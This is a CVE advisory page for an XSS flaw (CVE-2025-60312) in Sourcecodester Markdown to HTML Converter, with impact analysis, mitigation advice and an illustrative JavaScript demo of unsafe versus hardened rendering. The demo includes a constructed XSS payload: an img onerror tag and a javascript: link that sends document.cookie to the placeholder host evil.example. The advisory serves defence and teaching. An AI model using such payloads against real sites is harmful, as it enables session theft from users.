
CVE-2025-60312: n/a

Severity: Medium
Published: Tue Oct 07 2025 (10/07/2025, 00:00:00 UTC)
Source: CVE Database V5

Description

Sourcecodester Markdown to HTML Converter v1.0 is vulnerable to a Cross-Site Scripting (XSS) in the "Markdown Input" field, allowing a remote attacker to inject arbitrary HTML/JavaScript code that executes in the victim's browser upon clicking the "Convert to HTML" button.

AI-Powered Analysis

Last updated: 10/14/2025, 16:43:58 UTC

Technical Analysis

CVE-2025-60312 identifies a Cross-Site Scripting (XSS) vulnerability in Sourcecodester Markdown to HTML Converter version 1.0. The flaw is in the 'Markdown Input' field: user-supplied Markdown is converted to HTML and rendered without the generated output being sanitized or raw HTML in the input being neutralized, so an attacker who can get crafted Markdown into that field has arbitrary HTML or JavaScript executed in the victim's browser, on the application's origin, when the victim clicks 'Convert to HTML'. The vector this analysis assigns is network-based (AV:N), low attack complexity (AC:L), no privileges required (PR:N), user interaction required (UI:R), scope changed (S:C, because the injected script runs in the user's browser rather than inside the converter component itself), low confidentiality and integrity impact (C:L/I:L) and no availability impact (A:N). Note that the CVE record itself carries no CVSS score (Cvss Version is null in the technical details below), so treat this vector as an estimate rather than a published rating. The weakness is CWE-79, improper neutralization of input during web page generation. No patch has been published and no exploitation in the wild has been reported. The practical severity depends on a detail the description does not state, namely how Markdown reaches the field: if the only path is the user pasting text, the issue is largely self-XSS and needs social engineering; if the field can be pre-populated from a URL parameter, a shared document or a stored template, a remote attacker can deliver the payload and the usual XSS consequences apply: theft of session cookies that are not HttpOnly, requests forged in the user's session, phishing content rendered under the trusted origin, and further script execution. Because the tool converts Markdown to HTML it is plausibly embedded in web development or content-management workflows, which raises the risk wherever untrusted users can supply input.

Potential Impact

For European organizations the exposure is any web application or internal tool that embeds the vulnerable converter. Successful exploitation gives an attacker script execution in a user's browser on the application's origin, which can mean theft of session tokens (where cookies are not HttpOnly), actions performed in the victim's session, or malicious content delivered to users inside the organization; if personal data is exposed this becomes a GDPR incident as well as a loss of user trust. The user-interaction requirement rules out fully automated exploitation but not targeted attacks, since a victim can be induced to paste or open attacker-controlled Markdown and click the conversion button. Software development, content publishing and education organisations are the most likely users of this kind of tool. With no patch available the exposure window is open-ended, and XSS payloads need no special tooling once the flaw is widely known. The impact on confidentiality and integrity is moderate on its own and grows if the XSS is chained with other weaknesses in the hosting application.

Mitigation Recommendations

European organizations should audit for deployments of Sourcecodester Markdown to HTML Converter v1.0 in production and development environments. Until a fix exists, restrict the tool to trusted, authenticated users and disable public or anonymous access. Fix the rendering path rather than only filtering the input: either disable raw HTML passthrough in the Markdown renderer or HTML-escape the input before conversion (Markdown syntax still works, embedded tags do not), then run the generated HTML through an allowlist sanitizer such as DOMPurify before it is inserted into the DOM, and reject link and image targets whose scheme is not http or https so that javascript: URLs cannot survive conversion. Add a Content Security Policy that disallows inline scripts and event handlers (a script-src without 'unsafe-inline'); this blocks most injected JavaScript as long as the converter itself does not depend on inline scripts, but it does not stop injected HTML such as a fake login form, so treat it as defence in depth rather than the fix. Mark session cookies HttpOnly so that a script which does run cannot read them. Warn users not to paste Markdown from untrusted sources into the tool. Monitor application logs for unusual activity around the converter and consider isolating it in a sandboxed environment. Deploy a vendor patch as soon as one is released, and consider replacing the tool with an actively maintained Markdown converter that has a sound security record.
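The following is an editor's illustration of the flaw described in the technical analysis and of the output-side fix recommended above. It is not the Sourcecodester converter's code and makes no claim about how that application is implemented. It renders a small Markdown subset two ways: the unsafe variant hands raw HTML in the input straight through to the output and accepts any link scheme, while the hardened variant escapes the input before generating any markup and allows only http(s) link targets. The function names, the `hasActiveContent` check, the payload and the `evil.example` host are all constructed for this example.

```javascript
// Added example for CVE-2025-60312: NOT the Sourcecodester converter's own code.
// A tiny Markdown-subset renderer (# headings, **bold**, *italic*, [label](url),
// paragraphs) in two variants. The unsafe one reproduces the CWE-79 pattern the
// advisory describes (raw HTML in the input reaches the output); the hardened
// one escapes all input before adding markup and filters link targets.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that matter in HTML text and quoted attributes.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Allow only absolute http(s) targets; javascript:, data:, vbscript: and
// protocol-relative URLs are rejected (null) and the link is rendered as text.
function safeHref(url) {
  return /^https?:\/\/\S+$/i.test(url) ? url : null;
}

function renderInline(text, { escape, linkFilter }) {
  let out = escape ? escapeHtml(text) : text;
  out = out.replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>');
  out = out.replace(/\*(.+?)\*/g, '<em>$1</em>');
  out = out.replace(/\[([^\]]+)\]\(([^)]+)\)/g, (_m, label, url) => {
    const href = linkFilter ? linkFilter(url) : url;
    return href === null ? label : `<a href="${href}">${label}</a>`;
  });
  return out;
}

function renderMarkdown(markdown, options) {
  const blocks = markdown.split(/\n\s*\n/).map((b) => b.trim()).filter(Boolean);
  return blocks.map((block) => {
    const heading = /^(#{1,6})\s+(.*)$/.exec(block);
    if (heading) {
      const level = heading[1].length;
      return `<h${level}>${renderInline(heading[2], options)}</h${level}>`;
    }
    return `<p>${renderInline(block.replace(/\n/g, ' '), options)}</p>`;
  }).join('\n');
}

// Vulnerable variant: raw HTML and arbitrary link schemes pass straight through.
function convertMarkdownUnsafe(markdown) {
  return renderMarkdown(markdown, { escape: false, linkFilter: null });
}

// Hardened variant: input is escaped before any markup is generated, so the only
// tags in the output are the ones this renderer emits, and hrefs are filtered.
function convertMarkdownSafe(markdown) {
  return renderMarkdown(markdown, { escape: true, linkFilter: safeHref });
}

// Crude detector for output a browser would execute; adequate for this demo,
// a real review would parse the HTML instead of pattern-matching it.
function hasActiveContent(html) {
  return /<(script|img|svg|iframe|object|embed)\b/i.test(html)
    || /<[a-z][^>]*\son\w+\s*=/i.test(html)
    || /href\s*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed payload of the kind the advisory describes for the "Markdown
// Input" field: an event-handler tag plus a javascript: link that sends the
// cookie to an attacker host. evil.example is a placeholder, not a real host.
const PAYLOAD = [
  '# Release notes',
  '',
  'Thanks to **everyone** who *helped*.',
  '',
  '<img src=x onerror="alert(document.cookie)">',
  '',
  "[Download](javascript:document.location='https://evil.example/?c='+document.cookie) or [docs](https://example.com/docs)",
].join('\n');

console.log('--- unsafe output ---\n' + convertMarkdownUnsafe(PAYLOAD));
console.log('--- hardened output ---\n' + convertMarkdownSafe(PAYLOAD));
console.log('unsafe output executes script:', hasActiveContent(convertMarkdownUnsafe(PAYLOAD)));
console.log('hardened output executes script:', hasActiveContent(convertMarkdownSafe(PAYLOAD)));
```

Run with `node`: the unsafe output contains the `<img onerror>` tag and a `javascript:` href verbatim, the hardened output shows the tag as literal text, drops the `javascript:` link down to its label and keeps the `https://` link. The design point is that escaping happens before any markup is generated, so the only tags that can ever appear in the output are the ones the renderer itself emits; in a real deployment the equivalent is a Markdown library with raw HTML disabled plus an allowlist sanitizer on the result, with CSP and HttpOnly cookies as the backstop.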


Technical Details

Data Version: 5.1
Assigner Short Name: mitre
Date Reserved: 2025-09-26T00:00:00.000Z
Cvss Version: null (the CVE record carries no CVSS score; the vector cited in the analysis above is the analysis's own estimate)
State: PUBLISHED

Threat ID: 68e53917a677756fc995dfd8

Added to database: 10/7/2025, 4:00:23 PM

Last enriched: 10/14/2025, 4:43:58 PM

Last updated: 11/22/2025, 10:36:36 AM
